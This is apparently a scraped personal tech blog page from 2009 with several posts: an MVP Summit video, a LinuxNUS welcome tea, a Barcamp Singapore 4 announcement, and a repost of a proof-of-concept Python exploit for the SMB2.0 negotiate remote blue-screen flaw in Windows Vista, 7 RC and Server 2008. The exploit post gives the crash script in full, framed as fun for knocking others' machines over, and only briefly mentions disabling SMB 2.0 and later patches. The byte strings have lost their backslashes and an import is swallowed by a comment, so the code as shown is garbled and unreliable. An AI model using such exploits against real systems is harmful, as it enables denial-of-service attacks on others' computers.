It’s always interesting to see what I’ve done in the past, especially on video. Take a look. I talked about C# 4.0, and SharePoint development. Looking back, I wonder if I would have said the same thing now.
Channel 5.5: Justin Lee at the MVP Summit 2008 from Rob Windsor on Vimeo.
This might be a little late, but for those who are in NUS and are Linux or Opensource enthusiasts, come join us, LinuxNUS, for our first Welcome Tea of the semester. This year, our main focus is to drive the awareness of the existence of LinuxNUS and increase the number of members in the group. Just come and enjoy the company of the guys there! Also, do chat up with us on our irc channel at freenode.
Location: COM 1/SR10 @ NUS
Date: 09/09/09 (Wed) at 7pm
Register: HERE!
Original Post: Welcome Tea Sep 2009
So we’ve started our march towards Barcamp Singapore 4. Preetam Rai has done a great job securing an awesome place at the IDA office in Suntec Tower 3, 14th floor. There’s probably going to be 3 training rooms for barcamp sessions, 4 meeting rooms for brainstorming and discussions, and 1 lobby for food and networking. This is by far the most awesome Barcamp location, and it will be the most awesome Barcamp ever held in Singapore.
When: 21st November 2009
Where: IDA office at Suntec Tower 3, 14th floor.
So to all geeks, designers, social media, startups, and just anyone, go add your name as a participant to the wiki now, or even suggest a topic, at Barcamp Singapore 4 and join us in the spirit of sharing, brainstorming, discussing, and just plain old fun.
Remember the good old days when you’re able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for the limited time offer only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.
Here’s the proof of concept. I’m going to keep a copy here just in case.
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"x00x00x00x90" # Begin SMB header: Session message
"xffx53x4dx42" # Server Component: SMB
"x72x00x00x00" # Negociate Protocol
"x00x18x53xc8" # Operation 0x18 & sub 0xc853
"x00x26"# Process ID High: --> 
normal value should be "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe"
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54"
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31"
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00"
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57"
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61"
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c"
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c"
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e"
"x30x30x32x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.
Ah! The good old days again.
== Update ==
Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.
Original Post: Microsoft Security Advisory 975497 Released
== End Update ==
Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.